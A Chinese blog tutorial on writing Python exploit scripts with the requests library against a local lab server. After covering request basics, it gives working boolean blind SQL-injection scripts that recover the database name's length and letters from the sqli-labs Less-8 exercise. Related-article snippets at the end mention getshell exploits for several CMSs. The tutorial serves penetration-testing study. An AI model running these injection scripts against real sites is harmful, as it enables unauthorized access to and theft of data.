用Python编写EXP

最新推荐文章于 2024-02-02 00:16:58 发布
最新推荐文章于 2024-02-02 00:16:58 发布
阅读量2.3k 收藏 7
点赞数 2
分类专栏: 某教程学习笔记 文章标签: web安全 渗透测试 python编写exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/107922036
版权

高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。

----  网易云热评

一、环境

1、python3

2、用到的模块requests

 

二、requests模块应用

1、获取网页的内容

# coding=utf-8

import requests

res=requests.get("http://192.168.1.129/html/1.html")

print(res.content.decode("utf-8"))

2、获取头信息

3、获取提交的网址

print(res.headers)

print(res.url)

运行结果:

{'Date': 'Tue, 04 Aug 2020 13:01:06 GMT', 'Server': 'Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45', 'Last-Modified': 'Sun, 31 May 2020 15:48:24 GMT', 'ETag': '"676-5a6f39bc391c0"', 'Accept-Ranges': 'bytes', 'Content-Length': '1654', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html'}

http://192.168.1.129/html/1.html

4、修改访问时UA信息

# coding=utf-8

import requests

 

url="http://192.168.1.129/html/1.html"

header={"User-Agent":"aiyoubucuo"}

res=requests.get(url,headers=header)

 

print(res.request.headers)

运行结果:

{'User-Agent': 'aiyoubucuo', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}

5、超时处理,网页超过三秒没有反应当做异常

# coding=utf-8

 

 

import requests

 

 

url="http://192.168.1.129/html/chaoshi.php"

 

 

try:

    res=requests.get(url,timeout=3)

    print(res.request.headers)

except Exception as e:

    print("网页已超时!!!")

6、提交get数据

# coding=utf-8

 

import requests

 

url="http://192.168.1.129/get.php"

data={"aiyou":"bucuo"}

res=requests.get(url,params=data)

print(res.url)

 

运行结果:

http://192.168.1.129/get.php?aiyou=bucuo

7、POST提交数据

# coding=utf-8

 

import requests

 

url="http://192.168.1.129/post.php"

 

datas={"aiyou":"bucuo"}

res=requests.post(url,data=datas)

print(res.content.decode("utf-8"))

运行结果:

array(1) {

  ["aiyou"]=>

  string(5) "bucuo"

}

8、上传文件

# coding=utf-8

 

import requests

 

url="http://192.168.1.129/shangchuan.php"

upfile={"file":open("123.txt","rb")}

datas={"submit":"submit"}

res=requests.post(url,files=upfile,data=datas)

print(res.content.decode("utf-8"))

运行结果:

 

三、获取数据库长度

#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=8' and (length(database())) = 8 --+

 

# coding=utf-8

 

import requests

 

url="http://192.168.1.129/sqli/Less-8/"

reslen=len(requests.get(url=url+"?id=1").text)

print("正常情况下网页返回数据的长度"+str(reslen))

 

dblen=0

 

while True:

    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"

    print(dburl)

    if len(requests.get(dburl).text)==reslen:

        print("数据库名字长度为:"+str(dblen))

        break

    if dblen==30:

        print("出现错误!")

        break

    dblen+=1

运行结果:

 

四、获取数据库名字

# coding=utf-8

import string

 

 

import requests

 

 

 

 

url="http://192.168.1.129/sqli/Less-8/"

reslen=len(requests.get(url=url+"?id=1").text)

print("正常情况下网页返回数据的长度"+str(reslen))

 

 

#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=2' and (length(database())) = 8 --+

 

dblen=0

 

while True:

    dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"

    print(dburl)

    if len(requests.get(dburl).text)==reslen:

        print("数据库名字长度为:"+str(dblen))

        break

    if dblen==30:

        print("出现错误!")

        break

    dblen+=1

 

 

dbnmae=""

#生成8个字母

for i in range(1,9):

    #获取字母从a-z

    for a in string.ascii_lowercase:

        dburl=url+"?id=1'+and+substr(database(),"+str(i)+",1)="+"'"+a+"'"+"--+"

        print(dburl)

        if len(requests.get(dburl).text)==reslen:

            dbnmae+=a

            print(dbnmae)

            break

 

运行结果:

 

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
专栏目录
python实现定制EXP
weixin_51693574的博客
01-31 984
python实现定制EXP 一、POC和EXP 四个常见概念: POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的) EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的) Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:Payload的一种,由于其建立正向/反向shell而得名。 一个形象的比喻: 想象自己是特工,你目标是监控一个重要的
python编写EXP/POC速成小记
U_U520的博客
02-22 2051
find() 方法检测字符串中是否包含子字符串 str ,如果指定 beg(开始) 和 end(结束) 范围,则检查是否包含在指定范围内,如果包含子字符串返回开始的索引值,否则返回-1。上述脚本存在误报,就是payload只有一个单引号闭合,没办法检验数字型sql,双引号型,’)型,’))等在payload中多加几个类型,可以直接导入自己的FUZZ字典。漏洞刚被批漏之后,有时候现有的工具里面是没有相应的EXP的,那我们可以根据原理写对应的EXP代码,验证漏洞是否存在。不然会现报错不适用。
【CyberSecurityLearning 68】python 编写exp
_Co1a
04-15 495
目录 python 编写exppython脚本实现布尔盲注 用python脚本实现延时注入 文件上传 python 编写exp exp:漏洞利用工具 以Web 漏洞为主 要求: 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境:python3 核心模块:requests requests模块介绍详细请看:https://blog.csdn.net/Waffle666/article/details/115720052 定制头部 重新定义User-Agen.
python学习之phpcms exp编写
cxk
05-28 548
python学习之phpcms exp编写 针对phpcms v9.6 前台注册getshell exp编写,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import re import string import requests import random import time def getshell(host): try: ...
061 python实现EXP
鸡蛋炒鸡蛋
04-20 5248
文章目录一:概述二:环境准备三:requests库3.1:发送get请求3.2:相关方法3.3:相关操作3.3.1:定制头部3.3.2:超时3.3.3:GET传参 一:概述 python编写EXP,以web漏洞为主 exp 漏洞利用工具 1、能够看懂别人写的exp,并修改 2、能自己写exp 基础环境python3 核心模块requests 模块说明 requests是使用Apache2 license 许可证的http库 用python编写,比urllib2模块更简洁 requests支持http
EXP脚本编写
m0_62207482的博客
01-27 1013
EXP脚本的编写与POC脚本编写一样,只需要修改_attack部分,替换成漏洞 利用的脚本即可。Flask漏洞主要利用了框架的特点,在Flask中,“ {{}}” 中的内容会被当作代码 执行,相应的防御中就需要对“ {{}}”进行过滤,禁止此符号传入参数中。利用Pocsuite 3开源框架,可以接收用户输入的命令行参数,对目标系统进行 半交互控制,具体实现过程如下所示。首先,根据官方文档说明,编写一个接收自定义命令的函数,将接收到的命 令赋值给command参数。,最终效果如 图3-5所示。
使用python进行sql布尔盲注exp编写
CC210231的博客
04-04 2573
前言: 前面学习并实现了简单的注入exp编写,那是根据注入的payload 匹配 网页内容得到注入数据,像这种exp只能应用于简单的注入,盲注入就要复杂一些,但是原理也是差不多。 exp原理: 我们知道,对于sql布尔盲注,也就是页面只会返回两种状态,一种是注入语句正确执行返回正常页面,一种就是注入语句执行错误返回不正常页面,我们就可以通过返回页面的状态判断我们注入语句是否正确执行,在sql布尔盲注中,我们常通过逐个判断字符来得到最终的信息,源于此,我们就有如下思路了: 返回的页面不同,也就是返回.
使用python编写简单的文件上传exp
CC210231的博客
04-02 2135
最近开始学习使用python进行exp编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests的请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
基于python编写Web安全检测PoC&&EXP框架+源码+开发文档+代码解析(毕业设计&课程设计&项目开发)
最新发布
04-22
基于python编写Web安全检测PoC&&EXP框架+源码+开发文档+代码解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用~ 基于python编写Web安全检测PoC&&EXP框架+...
pythonexp函数_Python3 exp()函数
weixin_39551103的博客
12-21 577
语法以下是exp()方法的语法:import mathmath.exp( x )注:此函数无法直接访问,所以我们需要导入math模块,然后用数学静态对象调用这个函数。参数x--这是一个数字表达式返回值这个方法返回x的指数幂: ex.示例下面的示例显示exp()方法的使用。#!/usr/bin/python3import math # This will import math ...
python学习之dedecms exp编写
cxk
05-24 751
python学习之dedecms exp编写 针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。 exp # -*- coding:utf-8 -*- import requests import time def dada(url): url_index=url+"/install/index.php" headers = {"...
python学习之ecshop exp编写
cxk
06-04 518
python学习之ecshop exp编写 针对ecshop 2.x,漏洞分析请查看网上分析,不再赘述。 # -*- coding:utf-8 -*- import requests import time def ecshop(url): time.sleep(5) url_exp=url+"/user.php" a = "554fcae493e564ee0dc7...
Python灰帽编程——定制EXP武器库
来日可期的博客
09-22 1379
POC:(Proof of Concept)概念验证,常指一段漏洞证明的代码。 作用:用来证明漏洞存在的(无害的)EXP:(Exploit)利用,指利用系统漏洞进行攻击的动作。 作用:用来利用漏洞的(有害的)Payload:(攻击载荷,指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:利用漏洞时所执行的代码。Payload的一种,由于其建立正向/反向shell而得名。
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 2912
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
ctf-使用python进行sql布尔盲注exp编写
qq_51796436的博客
02-28 1921
文章目录exp编写sql注入布尔盲注 exp编写 poc:验证漏洞是否存在的程序 exp:利用exp能够实现漏洞的利用价值 sql注入 本篇需要了解sql注入的原理再食用
python学习之exp整合
cxk
06-10 991
python学习之exp整合 将上述的三个exp利用脚本整合为一个,简单的cms漏洞识别利用功能 使用方法 python demo.py "url" # -*- coding:utf-8 -*- import urllib import urllib.request import requests import os import hashlib #import test.py import ...
exp编写小技巧
m0_49959202的博客
08-14 857
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload exp编写小技巧 1.代码对齐 exp中填写地址时要注意代码长度的填充 2. 填充为指定长度 3. 链接远程服务器或者链接本地文件 # 远程 r = rem
POC-EXP编写
weixin_44110913的博客
08-18 3269
文章目录POC一.概念二.思维图解三.代码演示EXP一.概念二.思维图解三.代码演示 POC 一.概念 漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写对应的poc代码,验证漏洞是否存在。 作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。 二.思维图解 深入了解漏洞原理 拼接payload到url中或者header头和cookies中(大多数情况都这样) 发起请求 通过响应头判断中间件和脚本版本 根据其漏洞特征,判断该漏洞是否存在 三.代码演示
如何使用Python快速编写批量POC/EXP脚本(无脑版)
Liyu_6618的博客
02-02 1028
如何使用Python快速编写批量POC/EXP脚本(无脑版)
Pythonexp10it-1.0.3版本发布
标题中提到的“exp10it-1.0.3.tar.gz”是一个Python库的资源文件,而“exp10it”可能是该库的名称,虽然在Python的官方库中并未现这个库的记录,它可能是一个第三方库或一个较少使用的库。文件的扩展名“.tar.gz”...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值